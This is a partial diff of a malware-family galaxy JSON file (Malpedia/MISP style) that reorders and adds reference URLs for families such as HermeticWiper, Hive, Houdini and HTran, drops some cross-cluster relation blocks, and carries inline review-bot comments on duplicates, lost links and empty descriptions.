"https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/",
- "https://twitter.com/threatintel/status/1496578746014437376",
- "https://www.youtube.com/watch?v=sUlW45c9izU",
- "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
- "https://community.riskiq.com/article/9f59cb85",
+ "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
+ "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war",
+ "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
+ "https://www.englert.one/hermetic-wiper-reverse-code-engineering",
"https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html",
- "https://www.brighttalk.com/webcast/15591/534324"
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/",
+ "https://brandefense.io/hermeticwiper-technical-analysis-report/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/",
+ "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
+ "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/",
+ "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
+ "https://www.youtube.com/watch?v=sUlW45c9izU",
+ "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
+ "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
+ "https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/digging-into-hermeticwiper.html",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
+ "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/",
+ "https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
+ "https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/"
],
"synonyms": [
"DriveSlayer",
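Review bot: the refs list still carries two URLs both with and without a trailing slash after this rewrite: `https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine` (kept as context) next to the re-added `.../analysis-resources-cyber-threat-activity-ukraine/`, and likewise the two Trustwave `overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war` entries. Canonicalising trailing slashes before deduplication would collapse them. The six genuinely new refs in this hunk (Mandiant M-Trends 2023, the Microsoft hybrid-warfare report, Google's fog-of-war report, CrowdStrike's wiper anatomy part 3, the Microsoft on-the-issues post and the `mrTdSdMMgnk` YouTube link) are buried in a full reorder of roughly seventy lines; a stable sort would make them visible at a glance.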
@@ -26153,9 +27653,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
"https://twitter.com/silascutler/status/1501668345640366091",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
"https://twitter.com/ET_Labs/status/1502494650640351236",
"https://www.brighttalk.com/webcast/15591/534324"
],
@@ -26221,13 +27722,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee",
"https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/",
- "https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/",
"https://www.msreverseengineering.com/blog/2018/9/2/weekend-project-a-custom-ida-loader-module-for-the-hidden-bee-malware-family",
+ "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/",
+ "https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/",
"https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/",
"https://www.freebuf.com/column/175106.html",
- "https://www.freebuf.com/column/174581.html",
"https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/",
- "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/"
+ "https://www.freebuf.com/column/174581.html"
],
"synonyms": [],
"type": []
@@ -26240,14 +27741,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear",
- "https://twitter.com/struppigel/status/950787783353884672",
- "https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/",
- "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/",
- "https://github.com/goliate/hidden-tear",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://twitter.com/JAMESWT_MHT/status/1264828072001495041",
"https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html",
- "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring"
+ "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring",
+ "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/",
+ "https://twitter.com/JAMESWT_MHT/status/1264828072001495041",
+ "https://github.com/goliate/hidden-tear",
+ "https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/",
+ "https://twitter.com/struppigel/status/950787783353884672",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [
"FuckUnicorn"
@@ -26262,8 +27763,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
"http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
],
"synonyms": [],
@@ -26277,10 +27778,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
"https://twitter.com/MrDanPerez/status/1159461995013378048",
- "https://content.fireeye.com/apt-41/rpt-apt41/",
- "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html"
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
+ "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://content.fireeye.com/apt-41/rpt-apt41/"
],
"synonyms": [],
"type": []
@@ -26321,25 +27823,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit",
- "https://www.recordedfuture.com/hidden-lynx-analysis/",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
"https://attack.mitre.org/groups/G0001/",
- "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf"
+ "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
+ "https://www.recordedfuture.com/hidden-lynx-analysis/",
+ "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "06953055-92ed-4936-8ffd-d9d72ab6bef6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1",
"value": "HiKit"
},
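Review bot: besides reordering refs, this hunk deletes the entire `related` block (the `similar` link to dest-uuid 06953055-92ed-4936-8ffd-d9d72ab6bef6), and the same silent drop recurs in the HTran, HttpBrowser and HyperBro hunks below. If this is intentional (relations now maintained elsewhere) it should be stated in the commit message; otherwise these cross-cluster links are lost and MISP will no longer show the relationship for HiKit.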
@@ -26387,42 +27880,47 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hive",
- "https://www.connectwise.com/resources/hive-profile",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
"https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/",
- "https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
+ "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
+ "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
+ "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
+ "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.connectwise.com/resources/hive-profile",
"https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
+ "https://github.com/reecdeep/HiveV5_file_decryptor",
+ "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
+ "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
"https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/",
"https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://arxiv.org/pdf/2202.08477.pdf",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
+ "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals",
+ "https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/",
"https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://github.com/rivitna/Malware/tree/main/Hive",
- "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware",
+ "https://www.varonis.com/blog/hive-ransomware-analysis",
+ "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/",
"https://www.ic3.gov/Media/News/2021/210825.pdf",
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
- "https://blog.group-ib.com/hive",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
"https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/",
- "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
- "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/",
- "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive",
- "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
- "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
- "https://www.varonis.com/blog/hive-ransomware-analysis",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
+ "https://blog.group-ib.com/hive",
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again"
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://github.com/rivitna/Malware/tree/main/Hive",
+ "https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/"
],
"synonyms": [],
"type": []
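Review bot: the ref list now carries the Talos ransomware-chats.pdf URL twice, once bare and once with the `?1651576098` cache-buster query string; the generator should strip query strings (or normalize URLs before dedup) so the same document is not listed twice.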
@@ -26468,6 +27966,19 @@
"uuid": "379356c7-ec7a-4880-85d5-afe9608d6b60",
"value": "Holcus Installer (Adware)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun",
+ "https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1860127d-41cf-4fe8-a58c-9f5304b91fb1",
+ "value": "HOLERUN"
+ },
{
"description": " a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.",
"meta": {
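Review bot: the new HOLERUN entry ships with an empty `description`, as do the HuskLoader and HZ RAT entries added later in this patch; the Mandiant UNC961 post is its only non-Malpedia reference, so a one-line summary drawn from it (or from Malpedia's own description field) would make the cluster useful in search and correlation rather than a bare name with links.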
@@ -26502,15 +28013,15 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight",
"https://www.us-cert.gov/ncas/analysis-reports/ar19-304a",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.us-cert.gov/ncas/analysis-reports/AR19-100A",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g",
- "https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf",
- "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
"https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea"
],
"synonyms": [
@@ -26580,10 +28091,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf",
"https://content.fireeye.com/apt/rpt-apt38",
- "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/",
- "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
+ "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
],
"synonyms": [],
"type": []
@@ -26596,31 +28107,32 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini",
- "https://cofense.com/houdini-worm-transformed-new-phishing-attack/",
- "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html",
- "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
- "https://www.youtube.com/watch?v=XDAiS6KBDOs",
- "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
- "http://blog.morphisec.com/hworm-houdini-aka-njrat",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/",
- "https://www.youtube.com/watch?v=h3KLKCdMUUY",
- "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
"https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt",
- "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/",
- "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
- "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
"https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md",
- "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/",
- "https://blogs.360.cn/post/APT-C-44.html",
- "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
- "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37",
- "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
- "https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/",
+ "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
+ "https://www.youtube.com/watch?v=XDAiS6KBDOs",
"https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape"
+ "https://blogs.360.cn/post/APT-C-44.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/",
+ "https://www.youtube.com/watch?v=h3KLKCdMUUY",
+ "https://cofense.com/houdini-worm-transformed-new-phishing-attack/",
+ "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
+ "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html",
+ "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
+ "https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/",
+ "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
+ "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/",
+ "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/",
+ "http://blog.morphisec.com/hworm-houdini-aka-njrat",
+ "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html"
],
"synonyms": [
"Hworm",
@@ -26666,32 +28178,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.htran",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
"https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.secureworks.com/research/htran",
"https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
"https://www.secureworks.com/research/threat-profiles/bronze-mayfair",
- "https://www.secureworks.com/research/htran",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/"
],
"synonyms": [
"HUC Packet Transmit Tool"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f3bfe513-2a65-49b5-9d64-a66541dce697",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8",
"value": "HTran"
},
@@ -26700,27 +28203,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser",
- "https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/",
+ "https://attack.mitre.org/groups/G0026",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/",
- "https://attack.mitre.org/groups/G0026"
+ "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/",
+ "https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/"
],
"synonyms": [
"HttpDump"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "08e2c9ef-aa62-429f-a6e5-e901ff6883cd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f",
"value": "HttpBrowser"
},
@@ -26729,9 +28223,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper",
- "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf",
"http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf"
+ "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787"
],
"synonyms": [
"httpdr0pper"
@@ -26760,9 +28254,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf"
